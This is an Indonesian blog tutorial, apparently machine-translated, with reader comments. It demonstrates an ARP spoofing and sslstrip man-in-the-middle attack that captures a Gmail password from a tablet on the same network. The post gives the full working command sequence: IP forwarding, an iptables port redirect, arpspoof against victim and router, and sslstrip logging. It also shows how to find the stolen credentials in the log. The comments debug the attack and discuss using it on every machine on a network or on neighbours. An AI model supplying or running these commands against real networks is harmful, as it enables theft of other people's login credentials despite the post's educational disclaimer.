ArpSpoofing dan SSlstrip beraksi.

Halo Blogger.

Untuk hari ini saya memiliki contoh kecil tentang betapa berbahayanya terhubung ke jaringan tidak aman yang disukai oleh banyak dari kita.

Untuk hari ini, saya akan menggunakan ArpSpoofing dengan Sslstrip untuk mendapatkan kata sandi Gmail. Untuk membuat lingkungan lebih terkontrol, saya telah membuat akun bernama "testarp@gmail.com".

Dan karena saya tidak terlalu suka pembukaannya, mari kita mulai bisnis.

Saya tidak bertanggung jawab kapan pun atas apa yang dapat mereka lakukan dengan informasi berikut. Saya melakukannya secara eksklusif untuk tujuan pendidikan

LINGKUNGAN HIDUP

Untuk tes ini apa yang kami miliki adalah sebagai berikut:

1. Penyerang: Ini adalah komputer desktop atau desktop saya yang memiliki Debian Wheezy. Dari repositori Anda dapat menginstal sslstrip.dll y mengendus untuk mendapatkan harpspoofing

2. Korban: Korbannya adalah Tablet Android yang hanya ingin melihat emailnya melalui browser.

3. Media: Bagian tengah adalah milikku Cisco DPC2425 Router

ALAMAT.

Alamat penyerang: 172.26.0.2

Alamat Router: 172.26.0.1

Alamat Korban: 172.26.0.8

SERANGAN ITU:

Untuk memahami lebih banyak bagaimana serangan itu bekerja, Anda bisa pergi ke lama saya POST

Hal pertama yang akan kita lakukan untuk serangan ini adalah mengaktifkan penerusan sehingga komputer kita dapat meneruskan informasi kepada korban tanpa mereka sadari. (Jika tidak, itu akan menjadi serangan penolakan layanan)

Untuk itu kami akan menggunakan:

echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080

Setiap perintah di jendela konsol langsung.

Sekarang jika kita melakukan tail -f desdelinux kami melihat informasi secara langsung dan langsung

snapshot1

Jadi bagaimana kita mendapatkan apa yang kita inginkan?

Pertama-tama mari kita masukkan email kita di Tablet. Saat masuk, kami melihat ribuan dan ribuan hal muncul di konsol kami.

Sekarang sudah selesai mari kita buka file kita “desdelinux” dengan nano

nano desdelinux

dengan Control + W kami mencari sesuatu yang disebut SECURE POST.

Dan kita akan melihat sesuatu seperti ini.

snapshot2

Di antara garis besar yang tidak bisa dilihat adalah email dan kata sandi korban.

Jadi kami lari ke kanan sampai akhirnya kami melihat cahaya di ujung terowongan.

snapshot3

Pada kesempatan lain kita akan melihat bagaimana kita bisa sedikit melindungi diri kita sendiri dari serangan ini.

salam


tinggalkan Komentar Anda

Alamat email Anda tidak akan dipublikasikan. Bidang yang harus diisi ditandai dengan *

*

*

  1. Penanggung jawab data: Miguel Ángel Gatón
  2. Tujuan data: Mengontrol SPAM, manajemen komentar.
  3. Legitimasi: Persetujuan Anda
  4. Komunikasi data: Data tidak akan dikomunikasikan kepada pihak ketiga kecuali dengan kewajiban hukum.
  5. Penyimpanan data: Basis data dihosting oleh Occentus Networks (UE)
  6. Hak: Anda dapat membatasi, memulihkan, dan menghapus informasi Anda kapan saja.

  1.   @Lcmux dijo

    Saya mengambil kesempatan ini untuk mengatakan bahwa ketika posting diterbitkan, perintahnya tidak benar.

    Perintah iptables di akhir kehilangan 8080 yang ada di baris lain. Dan kemudian perintah arpspoof berada di baris yang sama. Setiap perintah berada di baris yang berbeda.

    Semoga editor melihatnya dan bisa memperbaikinya.

    Salam.

    1.    Manual dari Sumber dijo

      Saya telah membuat koreksi yang Anda sebutkan, apakah tidak apa-apa?

      Jika Anda akan menyisipkan kode di entri yang disukai, gunakan tampilan HTML, dan verifikasi bahwa artikel tersebut benar sebelum mengirimkannya ke tertunda. Terima kasih.

  2.   Luis dijo

    Sungguh mengerikan mengetahui bahwa kita yang tidak memiliki pengetahuan sangat rentan. Informasi yang sangat baik bahkan ketika saya memahami sedikit tentang subjek, saya menyadari pentingnya. Terima kasih!
    salam

  3.   giskard dijo

    Tapi itu hanya berfungsi jika penyerang dan korban berada di jaringan yang sama. Bagaimanapun, menurut saya jika (berada di jaringan yang sama) Anda terhubung menggunakan HTTPS itu tidak terjadi karena data dienkripsi SEBELUM meninggalkan mesin Anda. Jika Anda terhubung dengan HTTP (tanpa S) saya pikir bahkan melihat kabel jaringan Anda melihat kuncinya.

    1.    @Lcmux dijo

      Itu tidak benar. Saya meretas kata sandi gmail dan jika Anda melihat gmail menggunakan https. Begitu? Intinya adalah bahwa meskipun https aman, itu bergantung pada http. Jadi tidak begitu aman.

      Jangan terlalu banyak mengakui tentang https bahwa S bukan untuk Superman, itu untuk "aman"

    2.    Rten dijo

      ini bekerja dengan atau tanpa https, saya telah mencobanya dengan distro linux yang lebih khusus dan bekerja tanpa masalah

    3.    Manual dari Sumber dijo

      Anda dapat menggunakannya dengan tepat untuk mengajari mereka yang mencuri Wi-Fi Anda pelajaran. 😀

      Kurang lebih seperti yang mereka katakan di masa lalu di blog Chema Alonso:

      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html

      1.    Rayonan dijo

        Ostia, hebat sekali! / Dan kemudian mereka mengatakan paranoid saya setiap kali saya menggunakan VPN ketika mereka pergi untuk memeriksa rekening bank…). Ngomong-ngomong, Anda harus melihat betapa sinisnya orang-orang di komentar ... jika pada akhirnya itu mencuri ...

        1.    eliotime3000 dijo

          Sekarang kita perlu mengambil tutorial tentang cara membuat dan menawarkan layanan VPN Anda sendiri.

      2.    Daniel dijo

        Cerita yang Anda tautkan sangat menarik, bahkan tampaknya layak untuk sebuah buku novel, dan ini membuat saya ingat ketika saya menggunakan internet tetangga saya dan meskipun saya mengatakan saya tahu subjeknya, saya pikir saya tidak akan pernah bisa melihat dimensi sebenarnya dari bahaya yang bisa saya miliki bertahan, untung bagi saya, mereka hanya mengubah kata sandi menjadi WPA2 dan dari situlah cerita saya dengan ISP dimulai haha

    4.    Mauritius dijo

      Itulah mengapa judulnya mengatakan Sslstrip beraksi.

      Ini berhasil, selama penyerang ada di tengah

  4.   segera dijo

    Gelombang apa yang Anda kerjakan di prisma? -.-
    tidak.
    Apa yang Anda tunggu untuk mengirim permintaan Anda XD
    salam
    posting yang baik

  5.   auroszx dijo

    Menarik, saya akan melakukan tes pendidikan nanti ... Mungkin saya bahkan bisa menghapus kata sandi ke WiFi dan bersenang-senang sebentar 😛
    Kebetulan, dapatkah Anda melakukan sesuatu yang serupa untuk mengirim halaman berbeda ke halaman yang diminta target? Misalnya, mereka ingin membuka Facebook dan saya mengalihkannya ke Google? 😛

    1.    @Lcmux dijo

      Iya. Tapi itu semua sangat berbeda.

      Mungkin saya akan mempostingnya nanti.

  6.   newnewbie dijo

    posting yang sangat bagus, topik ini sangat mendidik, sekarang kita harus dapat melawan serangan ini, karena beberapa (seperti saya) terhubung ke jaringan publik (universitas misalnya) akan sangat membantu untuk menghindarinya.

    Salam!

  7.   hanya-lain-dl-pengguna dijo

    Itu tidak berhasil untuk saya 🙁

  8.   Wow dijo

    Sesuatu membuat saya gagal di sini, terlepas dari fakta bahwa koneksi https dienkripsi melalui sertifikat server (setelah Anda memiliki sertifikat di mesin Anda, browser Anda bertanggung jawab atas enkripsi) dengan iptables Anda mengalihkan port 80 (http) , bukan 443, yang merupakan https

    1.    @Lcmux dijo

      Saya juga berpikir begitu. Intinya adalah bahwa meskipun https "aman", sayangnya hal itu bergantung pada http. Jadi sslstrip memanfaatkannya, itu membuat browser percaya bahwa ia menggunakan kredensial https tetapi sebenarnya tidak.

      1.    Wow dijo

        Sialan! tetapi browser akan melihat peringatan seperti "sertifikat ini berasal dari situs yang mencurigakan atau semacamnya" ... Saya pasti harus melakukan tes XD

        1.    @Lcmux dijo

          Tidak, sama sekali tidak ada yang keluar.

  9.   hanya-lain-dl-pengguna dijo

    Itu akhirnya berhasil untuk saya
    Saya terhubung pada jaringan WEP dengan kata sandi, dan itu menunjukkan kata sandi secara langsung.

    Sebuah pertanyaan. Dapatkah Anda melakukan prosedur yang sama ini tetapi untuk semua komputer yang terhubung dalam jaringan, alih-alih memiliki satu korban?

    1.    @Lcmux dijo

      Ya kamu bisa. Tapi saya belum melakukan eksperimen. Cobalah sendiri dan beri tahu kami bagaimana kelanjutannya.

  10.   Sinnick 19 dijo

    Satu-satunya hal yang saya dapatkan dengan ini adalah bahwa mesin korban mati, tetapi sslstrip tidak menunjukkan apa pun kepada saya: /

    1.    @Lcmux dijo

      Anda harus menonaktifkan firewall sebentar. Atau setidaknya aktifkan koneksi masuk.

  11.   tuan hitam dijo

    Probe dan saya hanya bisa melihat username dan password halaman facebook, di gmail saya tidak menemukan hasil apapun di log, juga saya hanya membutuhkan baris arpspoof «arpspoof -i -t«. Di sisi lain, mesin korban tidak dapat membuka beberapa halaman. Saya akan terus menyelidiki, ini sangat menarik. Bantuan bagi mereka yang menggunakan Manjaro, paket yang akan diinstal adalah: dsniff (ini arpspoff), twisted dan python2-pyopenssl. Sslstrip dapat diunduh dari sini: http://www.thoughtcrime.org/software/sslstrip/
    Untuk menjalankannya $ python2 sslstrip.py
    Salam.

  12.   tuan hitam dijo

    Itu tidak keluar tetapi baris arpspoof adalah: #arpspoof -i int -t ip-korban ip-router

  13.   gilbert dijo

    lihat saya melakukan apa yang Anda katakan:

    echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 8080

    arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
    arpspoof -i eth0 -t 172.26.0.1 172.26.0.2

    Masalahnya adalah bahwa korban adalah pc lain yang saya miliki di sini di kamar saya, saya tidak memiliki koneksi sampai saya harus me-restart router, apa yang bisa saya bantu.

    Hal lain saya bekerja dengan mesin virtual, dan ketika saya menjalankan perintah iwconfig, wlan0 tidak muncul, atau ketika saya menjalankan ifconfig, namun, jika saya memiliki internet di mesin virtual saya, dengan antarmuka eth0.